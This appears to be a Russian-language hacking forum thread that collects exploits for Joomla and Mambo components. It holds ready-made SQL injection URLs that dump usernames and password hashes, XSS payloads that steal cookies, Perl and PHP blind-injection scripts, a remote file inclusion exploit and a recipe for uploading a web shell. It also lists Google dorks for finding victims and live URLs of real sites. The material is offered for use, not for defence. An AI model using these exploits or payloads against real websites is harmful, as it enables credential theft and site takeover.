$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
################################################## ###################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

com_clanwar Version: 1.2


require ("../../configuration.php");
$id = $_REQUEST['id'];
MYSQL_CONNECT($mosConfig_host,$mosConfig_user,$mos Config_password);
mysql_select_db($mosConfig_db);
$query = "select image_binary from jos_cwc_match_ss where id='$id'";
$result = MYSQL_QUERY($query);
$data = MYSQL_RESULT($result,0,"image_binary");
Header( "Content-type: image/jpeg");
echo $data;

magic_quotes_gpc off
http://joomla.ru/components/com_clanwar/getimage.php?id=1'+union+select+database()/*

================================================== ================================================== ==============


[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability

Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


================================================== ================================================== ==============


[o] Vulnerable file

administrator/components/com_treeg/admin.treeg.php

include( "$mosConfig_live_site/components/com_treeg/about.html" );



[o] Exploit

http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]


================================================== ================================================== ==============


[o] Greetz

MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
VOP Crew [ Vrs-hCk OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke


================================================== ================================================== ==============

# milw0rm.com [2008-11-01]

Joomla com_contactinfo 1.0 (catid)SQL-injection Vulnerability
________________________
http://www.milw0rm.com/exploits/7093

Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability

################################################## ################################################## ###############
#Author: Ded MustD!e
################################################## ################################################## ###############
#Google Dork: com_thyme
################################################## ################################################## ###############
#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,conc at(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_us ers/*
################################################## ################################################## ###############
#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,conc at(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_us ers/*
################################################## ################################################## ###############

<creationDate>10/10/2005</creationDate>
<author>eXtrovert software</author>
<copyright>eXtrovert software</copyright>
<authorEmail>thyme@extrosoft.com</authorEmail>
<authorUrl>www.extrosoft.com</authorUrl>
<version>1.0</version>

# milw0rm.com [2008-11-21]

(с)milworm.com

Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln
Joomla Component mydyngallery AUTHOR : Sina Yazdanmehr (R3d.W0rm)
Discovered by : Sina Yazdanmehr (R3d.W0rm)
Our Site : Http://IRCRASH.COM
IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi

Download : http://mydyngallery.mon-cottenchy.fr
DORK : inurl:option=com_mydyngallery

#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E, username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31+from+jos_users/*

Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;


my $host = shift;
my $myid = shift or &help;

my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
"union+select+1,concat(0x215F,username,0x3a,passwor d,0x215F)+".
"from+jos_users+where+id=${myid}--";

my $http = new LWP::UserAgent(
agent => 'Mozilla/4.5 [en] (Win95; U)',
timeout => '5',
);


my $response = $http->get($host.$path);

if($response->content =~ /!_(.+?)!_/i)
{
print STDOUT "Hash MD5: $1\n";
print STDOUT "Password: ".search_md5($1)."\n";
exit;
}
else
{
print STDOUT "Exploit Failed!\n";
exit;
}



sub search_md5
{
my $hash = shift @_;
my $cont = undef;

$cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);

if(length($hash) < 32 && !is_error($cont))
{
return $cont;
}
}


sub help
{
print STDOUT "Usage: perl $0 [host] [user ID]\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}



[b](c) milw0rm.com [2008-12-03 - 2008-12-04]

а из админки можно бд слить?

Есть неплохой вариант сделать такое... В несколько шагов:

Логинишься в админку --> ставишь компонент Joomla Explorer --> через него заливаешь шелл (в качестве альтернативы можно использовать просто просмотр configuration.php с логином и пассом от админа --> получаешь доступ к БД --> делаешь дамп... :)

SQL-Inj в com_fireboard:
http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/
+xss:
http://whiteguard-clan.ru/component/option,com_fireboard/func,fbprofile/task,showprf'%3Ch1%3Elol%3C/h1%3E/Itemid,5/userid,78/

Ещё один способ заливки шелла через админку, если прав на запись в /modules/ нет. Необходимо: PHP <=5.2.6:

Генерим архив (я использую либу из phpmyadmin):

<?php
include "Z:\home\localhost\www\Tools\phpmyadmin\libraries\z ip.lib.php";
$zipfile = new zipfile();
$zipfile -> addFile("<? system($"."_GET['cmd']) ?>", "../../images/shell.php");
$fp = fopen("file.zip","wb");
fputs($fp,$zipfile -> file());
fclose($fp);
?>

и заливаем его через модули. По адресу http://site/images/shell.php будет лежать ваш шелл.

а можно заливать и не в images, а на хост к соседу, на том же сервере, если есть соотетствующие права. ;)

Очередной дырявенький компонент.
Скачать мона на Joomla.ru. Побольше бы таких
wap4joomla <=1.5
Пример бажного скрипта... Вообще там почти сплошняком бажные скрипты...
<?php
/************************************************** *****************\
* File Name wap/onews/more.php *
* Date 30-04-2006 *
* For WAP4Joomla! WAP Site Builder *
* Writen By Tony Skilton admin@media-finder.co.uk *
* Version 1.5 *
* Copyright (C) 2006 Media Finder http://www.media-finder.co.uk *
* Distributed under the terms of the GNU General Public License *
* Please do not remove any of the information above *
\************************************************* ******************/
header("Content-Type: text/vnd.wap.wml");
echo"<?xml version=\"1.0\"?>"; ?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN"
"http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<? include("../../config.php"); ?>


<?
$id=$_GET["id"];
DB_connect($dbn,$host,$user,$pass);
$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");
while ($row = mysql_fetch_object($result)) {


$title = $row->title;
$done = $row->fulltext;

?>
<card id="news1" title="<? echo $title ?>">
<do type="prev" label="Back"><prev/></do>
<p>
<?

$done=eregi_replace("&nbsp;"," ",$done);
$done=eregi_replace("&","&amp;",$done);
$done=eregi_replace("<BR>"," <br />",$done);
$done=eregi_replace("<br>","<br />",$done);
$done=eregi_replace("</p>","<br />",$done);
$done=eregi_replace("<strong>","<b>",$done);
$done=eregi_replace("</strong>","</b>",$done);
$done=eregi_replace("<B>","<b>",$done);
$done=eregi_replace("</B>","</b>",$done);
$done=eregi_replace("{mosimage}"," ",$done);
$title=eregi_replace("&","&amp;",$title);
$atags = "<b><br />";
$done = strip_tags($done, $atags);
$hmmm = "$done<br/>";

if (strlen($done)>$trim){
$wellover=substr($done,$trim+$over,1);
while($wellover!="\n"){
$wellover=substr($done,$trim+$over,1);
$trim=$trim-1;
};
$trim++;
if (isset($over)){
if ($over>=$trim){
$tmp=$over-$trim;
?>
<a href="<? echo "more.php?id=$id&amp;over=$tmp"?>">Back...</a>
<?
};

}else{
$over=0;
};

print substr($hmmm,$over,$trim);
$over=$over+$trim;
if (strlen($done)>$over){
?>
<a href="<?print "more.php?id=$id&amp;over=$over"?>">...Read on</a>
<?
};
} else {
print $hmmm;
};
}
?>
</p></card> </wml>
опасная строчка
$id=$_GET["id"];
DB_connect($dbn,$host,$user,$pass);
$result = mysql_query("SELECT * FROM ".$dbpre."content WHERE id=$id");
while ($row = mysql_fetch_object($result)) {


$title = $row->title;
$done = $row->fulltext;


exploit
http://has-implex.narod.ru/wap4joomla.txt
http://site.ru/joomla/wap/onews/more.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28+from+jos_users--
(С)ImpLex

Joomla Component Bibliography Blind-SQL/pXSS

Уязвимый продукт: Joomla Component Bibliography
Версия: <= 1.3
Дорк: "inurl:com_bibliography"

1. Blind-SQL
Уязвимость в файле bibliography.php.
Уязвимый кусок кода:
$count_query = "SELECT id FROM ".$mosConfig_dbprefix."bibliography WHERE published = 1 AND catid=$catid";
$count_result = $database->setquery($count_query);
$count_result = $database->query();
$count = mysql_num_rows($count_result);
$gesamtseiten = floor($count / $gl_perpage);

Из кода видно, что параметр $catid не обрамляется в кавычки и ранее нигде не фильтруется - это даёт нам возможность провести sql инъекцию.
Так же из кода видно, что полученное значение делится на число (количество страниц), а затем уже только выводится - это и есть причина слепоты в данной инъекции.

Exploit: true: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=1/*
false: /index.php?option=com_bibliography&func=display&letter=&Itemid=&catid=1+and+1=2/*
Example: true: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=4/*&page=1
false: http://www.irtg.uni-kl.de/index.php?option=com_bibliography&func=display&letter=B&Itemid=53&catid=67+and+substring(version(),1,1)=5/*&page=1

2. Пассивная XSS

Уязвимость в файле bibliography.php.
Уязвимый кусок кода:

else{
if ($letter=='All') echo "<font size='4'><strong>"._BIBLIOGRAPHY_ALL."</strong></font>";
elseif ($letter=='Other') echo "<font size='4'><strong>"._BIBLIOGRAPHY_OTHER."</strong></font>";
elseif ($letter=='[nothing]') echo "";
else echo "<font size='4'><strong>".$letter."</strong></font>";

Из кода видно, что параметр $letter не фильтруется.

Получаем пассивную XSS:

index.php?option=com_bibliography&func=display&Itemid=43&catid=25&letter=<script>alert(/grey/);</script>

P.S. здесь был Грей)))

Joomla Component Userlist SQL-INJ

Уязвимый продукт: Joomla Component Userlist
Версия: 2.5 (в более ранних версиях не прокатывает - другой запрос)
Дорк: "inurl:com_userlist"

SQL-INJ

Необходимое условие: magic_quotes_gpc = Off
Уязвимость в файле userlist.php.
Уязвимый кусок кода:

if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";

Параметр $search не фильтруется, но обрамляется в кавычки, значит без ковычек тут не обойтись.

Эксплуатация:

В поле поиска пользователя вбиваем следующее:
1' and 1=2) and 1=2 union select 1,2,3,4,5,6-- 1
Получаем логин и пароль:
1' and 1=2) and 1=2 union select concat(username,char(58),password),2,3,4,5,6 from jos_users-- 1

Уязвимости предыдущих версий:
Версия 2.0 SQL-INJ /index.php?option=com_userlist&limitstart=0,0+union+select+1,2,3,4--+1

Joomla Component Productbook Blind-SQL

Уязвимый продукт: Joomla Component Productbook
Версия: 1.0.4
Дорк: "inurl:com_productbook"

Blind SQL-INJ

Уязвимость в файле productbook.php.
Уязвимый кусок кода:

$database->setQuery("SELECT a.*, cc.name AS category "
. " \n FROM #__productbook AS a, #__productbook_catg AS cc "
. " \n WHERE a.catid=cc.cid AND a.id=$id "
. " \n AND cc.access<='$gid'");


Exploit:

true: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=1
false: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=2


Example:

true: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=5
false: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=4

Код:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E

Примеры:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E

Уязвимый продукт: Joomla Component Extcalendar
Дорк: "inurl:com_extcalendar"

http://[target]/[path]/components/com_extcalendar/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,usernam e,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gi d=24+limit+0,1/*

Таже бага тока в новой упаковке :)


Уязвимый продукт: Joomla Component JCalPro
Дорк: "inurl:com_jcalpro"

http://[target]/[path]/components/com_jcalpro/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,usernam e,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gi d=24+limit+0,1/*

PS юзаю почти 2 года

Joomla Component com_hbssearch(r_type) Blind SQL-injection

http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]

LiveDEMO:

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->FALSE

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->TRUE

# milw0rm.com [2008-12-21]

Joomla Component com_tophotelmodule(id) Blind SQL-injection

Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]


LiveDEMO:

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE

# milw0rm.com [2008-12-21]

Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7568

:::::::

Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7567

Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7572

::::

Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7573

:::::

Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
__________
http://www.milw0rm.com/exploits/7574

:::::

Joomla Component 5starhotels (id) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7575

Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7670

:::::

Joomla com_na_newsdescription (newsid) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7669

:::::
__________
Joomla Component simple_review 1.x SQL Injection Vulnerability

:::::

http://www.milw0rm.com/exploits/7667

Компонент ReMOSitory 341RE (com_remository)
XSS

/index.php?option=com_remository&Itemid=1&func=select_XSS&

Пример:

http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=select_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2

Двиг: Joomla
Компонент: com_gigcal(gigcal_gigs_id)
Уязвимость: SQL-injection

http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password) ,0,11,12+from+jos_users/*

Joomla

Компонент: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Уязвимость: SQL-injection

http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password )KHG,3,4,5,6+from+jos_users--
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password )KHG,3+from+jos_users--
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password) KHG,2,3+from+jos_users--
Author:"Adrian Gray"

Компонент: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Уязвимость: SQL-injection

http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author:"Noel Hunter"

Joomla
Компонент: com_Eventing 1.6.x
Уязвимость: SQL Injection Exploit
<?php
ini_set("max_execution_time",0);
print_r('
################################################## ############################
#
# Joomla com_Eventing Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
################################################## ############################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_use rs+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_use rs+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>

# milw0rm.com [2009-01-15]
Компонент: RD-Autos 1.5.2
Уязвимость: SQL Injection Vulnerability

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+ from+jos_users--&Itemid=54

Joomla
Компонент: Gigcal 1.x
Уязвимость: SQL Injection Vulnerability
Exploit : http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(user name,char(58),password),11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25+from+jos_users/*

Компонент: com_pccookbook
Уязвимость: Blind SQL Injection Exploit

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## #######################\n";
print " # \n";
print " # Joomla com_pccookbook Blind sql injection exploit \n";
print " # \n";
print " # Cyb3R-1sT \n";
print " # cyb3r-1st[at]hotmail.com \n";
print " # \n";
print " # Usage:perl file.pl host path <options> \n";
print " # example: perl file.pl www.host.com /joomla/ -a 7 \n";
print " # \n";
print " # Options: -a id \n";
print " # \n";
print " ################################################## #######################\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] Password: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Ingredients";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

Компонент: com_news
Уязвимость: SQL Injection Vulnerability

Exploit:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28+from+jos_users--

Компонент: com_waticketsystem
Уязвимость: Blind SQL Injection Exploit
<?php
ini_set("max_execution_time",0);
print_r('
################################################## ############################
#
# Joomla com_waticketsystem Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == inject0r5 t3am ==
#
# usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
################################################## ############################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_use rs+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_use rs+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_use rs+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>

Joomla Component beamospetition 1.0.12 SQL Injection / XSS
_______
http://www.milw0rm.com/exploits/7847
:::::

Joomla com_pcchess (game_id) Blind SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7846
:::::

Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability
_______
http://www.milw0rm.com/exploits/7841
:::::

Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7840

XSS

Joomla Component Reservation Manager
Version: 1.7 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parametre: year
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_resman"
Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&year=2010"><script>alert(document.cookie)</script>

Joomla Component Car Manager
Version: 2.1 (last update on Jan 6, 2009)
Type: Commercial (129$)
Vulnerable parametre: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_carman"
Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

Joomla Component Time Slot Registration
Version: 1.0.5 (last update on Mar 26, 2008)
Type: Non-Commercial
Vulnerable parametre: entity
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_time_slot_registration"
Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=viewEventsList&entity="><script>alert(document.cookie)</script>

Joomla Component Hire Manager
Version: 1.2 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parametre: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hireman"
Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(document.cookie)</script>

Joomla Component hwdCourses beta
Version: 1.1.1 (last update on Apr 29, 2008)
Type: Non-Commercial
Vulnerable parametre: dif, type
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hwdcourses"
Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Classic"><script>alert(document.cookie)</script>

Mambo com_sim v0.8 Blind SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7860

Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability
exploit:
http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL

union+select+1,2,3,unhex(hex(version())),5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35/*

источник:http://milw0rm.com/
--------------------------------------------------------------
The End!

может было.. затрете, если да.

нашел такой сайтец _http://www.joomlascan.com
- сканировал 1.0.13 с модулем com_datsogallery и нифига не нашло - может кому больше повезет ;)

еще одна тулза - _http://sourceforge.net/projects/joomscan/
вроде живой проект.

Компонент com_xevidmegafx
Sql-inj
уязвимость в параметре id:
http://site.com/index.php?option=com_xevidmegafx&Itemid=34&func=detail&id=28{SQLINJ}
19 столбцов
по идее можно попробывать +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19--
но не нашел выводимые поля, поэтому перебирал как Blind SQL

############################################
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
############################################

- dork: inurl:"index.php?option=com_djiceshoutbox"

The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:

"><script>alert('XaDoS')</script>

or

'">><script>alert('XSS By XaDoS')</script>

the XSS become permanent in every page of site!
not critical damage but it's not funny..

[+] D3M0:

http://www.djiceatwork.com

contact me at xados @ hotmail . it
www.securitycode.it

# milw0rm.com [2009-03-10]

[+] Bugs


- [A] SQL Injection

[-] Security risk: low
[-] File affected: sub_commententry.php

This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulate to write
files on system.


*************************************************

[+] Code


- [A] SQL Injection

http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,pa ssword),11,12,13,14,15,16 FROM jos_users


*************************************************

[+] Fix

No fix.


*************************************************

# milw0rm.com [2009-04-06]

################################################## ###########################
# #
# Joomla Component MailTo SQL Injection Vulnerability #
# #
################################################## ###########################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName: "Joomla"
[~] Component: "MailTo (com_mailto)"
[~] Date: "April 2006"

########################################

[~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
[~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(usernam e,char(58),password)KHG+from+jos_users--&Itemid=1

########################################

[~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(usernam e,char(58),password)KHG+from+jos_users--&Itemid=1

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de

########################################

----------------------------------------------------------------+

################################################## ###########################
# #
# Joomla Component MaianMusic SQL Injection Vulnerability #
# #
################################################## ###########################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
